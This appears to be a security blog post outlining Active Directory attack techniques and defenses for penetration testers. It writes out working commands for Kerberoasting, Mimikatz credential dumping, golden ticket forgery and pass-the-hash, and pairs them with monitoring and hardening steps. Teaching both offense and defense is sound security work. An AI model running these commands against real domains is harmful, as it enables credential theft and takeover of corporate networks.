Listen to this Post
Active Directory (AD) remains the backbone of corporate networks and a primary target in Red Team operations and penetration testing. This guide covers essential AD components, attack techniques, and defense strategies.
Essential AD Components
- Domain Controllers (DCs): Manage authentication and authorization.
- Active Directory Database (NTDS.dit): Stores user credentials and hashes.
- Kerberos: Authentication protocol used in AD environments.
- Group Policy Objects (GPOs): Enforce security policies across the network.
- Organizational Units (OUs): Logical containers for AD objects.
Typical Attack Lifecycle
- Reconnaissance: Gather AD information using tools like `ldapsearch` and
BloodHound. - Initial Access: Exploit weak credentials, phishing, or misconfigurations.
- Privilege Escalation: Use tools like `Mimikatz` to extract credentials.
4. Lateral Movement: Pass-the-hash, pass-the-ticket, or RDP hijacking.
5. Persistence: Golden/Silver Ticket attacks or backdoor creation.
Key Attack Techniques
1. Kerberoasting
Extract service account hashes and crack them offline:
GetUserSPNs.py -request -dc-ip <DC_IP> domain/user
2. Mimikatz (Credential Dumping)
Extract plaintext passwords and hashes from memory:
mimikatz.exe "sekurlsa::logonpasswords"
3. Golden Ticket Attack
Forge TGT (Ticket Granting Ticket) using KRBTGT hash:
mimikatz.exe "kerberos::golden /domain:domain.com /sid:S-1-5-21-... /krbtgt:<hash> /user:Administrator"
4. Pass-the-Hash (PtH)
Authenticate without plaintext passwords:
psexec.exe -hashes <LM:NTLM_hash> user@target
Fundamental Defense Strategies
- Enable LSA Protection: Prevent credential dumping via
Mimikatz. - Implement Strong Password Policies: Enforce long, complex passwords.
- Monitor Kerberos Logs: Detect Golden Ticket attacks via Event ID 4769.
- Restrict Admin Privileges: Use the principle of least privilege.
- Regularly Patch Systems: Prevent exploitation of known vulnerabilities.
You Should Know:
1. Enumerate AD with PowerView
Get-NetUser | Select-Object samaccountname,description Get-NetGroup -GroupName "Domain Admins"
2. BloodHound for AD Mapping
bloodhound-python -d domain.com -u user -p 'password' -ns <DC_IP> -c All
3. Detect Abnormal Logins
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624,4625} | Format-List
4. Secure NTLM Authentication
Disable NTLM where possible:
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" -Name "LmCompatibilityLevel" -Value 5
What Undercode Say
Active Directory is a critical attack surface in enterprise networks. Understanding both offensive and defensive techniques is crucial for penetration testers and security professionals. Regular audits, strong credential hygiene, and monitoring for suspicious activities can mitigate most AD-based attacks.
Expected Output:
- A mapped AD environment with potential attack paths.
- Extracted credentials for privilege escalation.
- Detection of misconfigurations leading to lateral movement.
For further reading:
References:
Reported By: Dharamveer Prasad – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
